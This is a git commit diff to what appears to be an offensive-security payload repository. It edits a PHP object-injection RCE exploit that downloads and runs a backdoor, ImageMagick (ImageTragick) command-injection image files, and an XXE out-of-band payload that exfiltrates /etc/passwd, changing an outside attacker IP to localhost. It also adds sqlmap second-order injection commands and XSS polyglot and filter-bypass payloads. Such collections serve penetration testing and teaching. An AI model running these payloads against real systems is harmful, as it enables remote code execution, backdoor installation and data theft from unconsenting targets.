Payloads - Quick fix

2018-02-23 13:48:51 +01:00 · 2018-02-23 13:48:51 +01:00 · 70f38d5678
parent b87c3fd7ff
commit 70f38d5678
6 changed files with 66 additions and 36 deletions
--- a/serialization/PHP-Serialization-RCE-Exploit.php
+++ b/serialization/PHP-Serialization-RCE-Exploit.php
@ -19,7 +19,7 @@ system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
 class PHPObjectInjection
 {
   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
-   public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
+   public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
 }

 $url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
--- a/injection/README.md
+++ b/injection/README.md
@ -37,6 +37,13 @@ python sqlmap.py -u "http://example.com" --data "username=admin&password=pass"
 The injection is located at the '*'
 ```

+Second order injection
+```
+python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
+sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
+```
+
+
 General tamper option and tamper's list
 ```
 tamper=name_of_the_tamper
@ -328,3 +335,6 @@ mysql> mysql> select version();
  - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
  - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
  - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+* Second Order:
+  - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
+  - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
--- a/Tragik/payload_imageover_wget.gif
+++ b/Tragik/payload_imageover_wget.gif
@ -1,4 +1,4 @@
 push graphic-context
 viewbox 0 0 640 480
-image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`'
+image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`'
 pop graphic-context
--- a/Tragik/payload_url_curl.png
+++ b/Tragik/payload_url_curl.png
@ -1,4 +1,4 @@
 push graphic-context
 viewbox 0 0 640 480
-fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)'
+fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)'
 pop graphic-context
--- a/injection/README.md
+++ b/injection/README.md
@ -83,26 +83,6 @@ With an additional URL
 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
 ```

-XSS in flash application
-```
-flashmediaelement.swf?jsinitfunctio%gn=alert`1`
-flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
-ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
-swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
-swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
-plupload.flash.swf?%#target%g=alert&uid%g=XSS&
-moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
-video-js.swf?readyFunction=alert(1)
-player.swf?playerready=alert(document.cookie)
-player.swf?tracecall=alert(document.cookie)
-banner.swf?clickTAG=javascript:alert(1);//
-io.swf?yid=\"));}catch(e){alert(1);}//
-video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
-bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
-flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
-phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
-```
-
 XSS in Hidden input
 ```
 <input type="hidden" accesskey="X" onclick="alert(1)">
@ -159,6 +139,7 @@ XSS with data:
 ```
 data:text/html,<script>alert(0)</script>
 data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
+<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
 ```

 XSS with vbscript: only IE
@ -200,7 +181,7 @@ XSS in SVG (short)
 <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 ```

-XSS in SWF
+XSS in SWF flash application
 ```
 Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
@ -213,10 +194,30 @@ open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/
 http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/
 eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain)
 ```
-
 more payloads in ./files


+XSS in SWF flash application
+```
+flashmediaelement.swf?jsinitfunctio%gn=alert`1`
+flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
+ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
+swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
+swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
+plupload.flash.swf?%#target%g=alert&uid%g=XSS&
+moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
+video-js.swf?readyFunction=alert(1)
+player.swf?playerready=alert(document.cookie)
+player.swf?tracecall=alert(document.cookie)
+banner.swf?clickTAG=javascript:alert(1);//
+io.swf?yid=\"));}catch(e){alert(1);}//
+video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
+bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
+flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
+phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
+```
+
+

 ## XSS with Relative Path Overwrite - IE 8/9 and lower

@ -412,6 +413,17 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
 /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
 ```

+Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
+![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
+```
+-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
+```
+![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
+```
+<svg%0Ao%00nload=%09((pro\u006dpt))()//
+```
+
+

 ## Filter Bypass and exotic payloads

@ -491,16 +503,22 @@ foo="text </script><script>alert(1)</script>";
 </script>
 ```

-Bypass using an alternate way to execute an alert
+Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
 ```
-<script>window['alert'](0)</script>
-<script>parent['alert'](1)</script>
-<script>self['alert'](2)</script>
-<script>top['alert'](3)</script>
-<script>this['alert'](4)</script>
-<script>frames['alert'](5)</script>
-<script>content['alert'](6)</script>
+window['alert'](0)
+parent['alert'](1)
+self['alert'](2)
+top['alert'](3)
+this['alert'](4)
+frames['alert'](5)
+content['alert'](6)

+[7].map(alert)
+[8].find(alert)
+[9].every(alert)
+[10].filter(alert)
+[11].findIndex(alert)
+[12].forEach(alert);
 ```

 Bypass using an alternate way to trigger an alert
@ -677,3 +695,5 @@ Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermissi
 * http://d3adend.org/xss/ghettoBypass
 * http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
 * http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
+* https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
+* https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
--- a/injections/README.md
+++ b/injections/README.md
@ -125,15 +125,15 @@ XXE OOB with DTD and PHP filter
 <?xml version="1.0" ?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
-<!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
+<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
 %sp;
 %param1;
 ]>
 <r>&exfil;</r>

-File stored on http://92.222.81.2/dtd.xml
+File stored on http://127.0.0.1/dtd.xml
 <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
-<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
 ```

 XXE Inside SOAP